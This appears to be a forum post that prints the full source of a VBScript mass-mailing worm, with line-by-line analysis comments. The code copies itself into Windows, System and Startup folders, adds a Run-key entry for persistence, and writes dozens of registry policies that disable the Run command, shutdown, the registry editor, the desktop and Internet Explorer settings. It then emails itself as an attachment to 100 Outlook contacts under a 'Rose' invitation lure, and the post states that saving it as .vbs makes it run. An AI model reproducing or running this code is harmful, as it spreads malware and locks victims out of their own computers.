vbs病毒代码及其分析

// Setup and self-replication stage of the sample.
// "On Error Resume Next" suppresses runtime errors, so any step that fails is skipped silently.
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
// GetSpecialFolder(0) is the Windows folder and GetSpecialFolder(1) is the System folder.
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
// A second FileSystemObject; redundant with fs, but it is the one the copy calls below use.
Set so=CreateObject("Scripting.FileSystemObject")
dim r
// WScript.Shell object; every RegWrite call later in the script goes through it.
Set r=CreateObject("Wscript.Shell")
// The running script (WScript.ScriptFullName) copies itself three times under one fixed name.
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"Win32system.vbs")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"Start MenuPrograms启动Win32system.vbs")

// Author's note: copies the virus into the Windows folder (windows/winnt), the System folder
// (system/system32) and the Startup folder of the Start menu.
// NOTE(review): the string literals appear to have lost their path separators when the page was
// extracted. For triage the indicator is the file name Win32system.vbs in those three locations.

// Registry stage: lock down the shell, remove the usual recovery tools, and register persistence.
// Every line is a plain value write through WScript.Shell (r). The trailing notes translate the
// page author's analysis, which the author marks as unverified.
// NOTE(review): the key paths are shown as extracted, apparently without separators. Match on the
// value names when building detections.
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun",1,"REG_DWORD" // NoRun: removes the "Run" command from the Start menu
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose",1,"REG_DWORD" // NoClose: removes the "Shut Down" command
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives",63000000,"REG_DWORD" // NoDrives: hides drive letters (the value is a per-drive bitmask)
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools",1,"REG_DWORD" // DisableRegistryTools: blocks the Registry Editor, which hinders manual cleanup
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunScanRegistry","" // blanks the Run entry named ScanRegistry; per the author this disables the registry scan
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff",1,"REG_DWORD" // NoLogOff: removes the "Log Off" command
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode",1,"REG_DWORD" // NoRealMode: blocks entering MS-DOS real mode
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32system","Win32system.vbs" // persistence: Run value "Win32system" starts the dropped script at boot
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop",1,"REG_DWORD" // NoDesktop: hides every desktop icon, leaving only the wallpaper visible
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled",1,"REG_DWORD" // WinOldApp Disabled: author's guess is that this blocks MS-DOS mode
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetTaskBar",1,"REG_DWORD" // NoSetTaskBar: author says taskbar and Start menu are disabled; presumably it locks their settings - TODO confirm
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu",1,"REG_DWORD" // NoViewContextMenu: disables the right-click menu
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoSetFolders",1,"REG_DWORD" // NoSetFolders: per the author, disables the Control Panel
r.Regwrite "HKLMSoftwareCLASSES.reg","txtfile" // re-associates .reg with the text-file class so .reg files can no longer be imported by opening them
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption","nihaoa " // LegalNoticeCaption: title of the notice shown at startup
r.Regwrite "HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText","nihaoa aa a aa a " // LegalNoticeText: body of the notice shown at startup

// Propagation stage: mass-mailing through Outlook automation.
// Defensive view: a script host creating Outlook.Application and sending mail with a .vbs
// attachment is the behaviour to alert on. Filtering script attachments at the mail gateway stops
// this spreading path.
Set ol=CreateObject("Outlook.Application") // author: mail sending starts here (this is how the virus spreads)
// Errors stay suppressed, so missing address entries or a failed send do not stop the loop.
On Error Resume Next
For x=1 To 100 // hard-coded bound: entries 1 to 100 of the address list
Set Mail=ol.CreateItem(0)
// Recipient is entry x of the first MAPI address list.
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="还在忙吗?" // subject line of the lure; it means "Still busy?"
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 来自Rose的问候!" // body of the lure: a greeting "from Rose" asking the reader to open the attachment
Mail.Attachments.Add(dir2&"Win32system.vbs") // attaches the copy dropped in the System folder; a recipient who opens it is infected in turn
Mail.Send
Next
ol.Quit

// Second registry stage: Internet Explorer restrictions plus one more Explorer policy.
// These are value writes through the same WScript.Shell object (r). The trailing notes translate
// the page author's analysis, which the author marks as unverified.
// NOTE(review): the key paths are shown as extracted, apparently without separators. Match on the
// value names when building detections.
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu",1,"REG_DWORD" // NoBrowserContextMenu: disables the right-click menu in IE
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions",1,"REG_DWORD" // NoBrowserOptions: disables "Internet Options"
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserSaveAs",1,"REG_DWORD" // NoBrowserSaveAs: disables "Save As"
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFileOpen",1,"REG_DWORD" // NoFileOpen: disables "File > Open"
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAdvanced",1,"REG_DWORD" // Advanced: blocks changes to the advanced settings
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelCache Internet",1,"REG_DWORD" // Cache Internet: blocks changes to the temporary-file settings
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelAutoConfig",1,"REG_DWORD" // AutoConfig: blocks changes to automatic configuration
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage",1,"REG_DWORD" // HomePage: blocks changing the home page
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHistory",1,"REG_DWORD" // History: blocks changes to the history settings
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelConnwiz Admin Lock",1,"REG_DWORD" // Connwiz Admin Lock: the Internet Connection Wizard
r.Regwrite "HKEY_USERS.DEFAULTSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.baidu.com" // sets the default start page
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelSecurityTab",1,"REG_DWORD" // SecurityTab: disables the Security tab
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelResetWebSettings",1,"REG_DWORD" // ResetWebSettings: disables "Reset Web Settings"
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource",1,"REG_DWORD" // NoViewSource: disables "View Source"
r.Regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictionsNoAddingSubScriptions",1,"REG_DWORD" // NoAddingSubScriptions: disables adding offline-page subscriptions
r.Regwrite "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu",1,"REG_DWORD" // NoFileMenu: removes the File menu in Explorer


 

以上是病毒代码及分析,每行“//”后面的内容是我的分析,不知道对不对,欢迎大家指教。把上边的代码保存成.vbs格式就可以运行,其毒性很大,大家可要小心;中毒了要及时杀掉,不然会继续传播。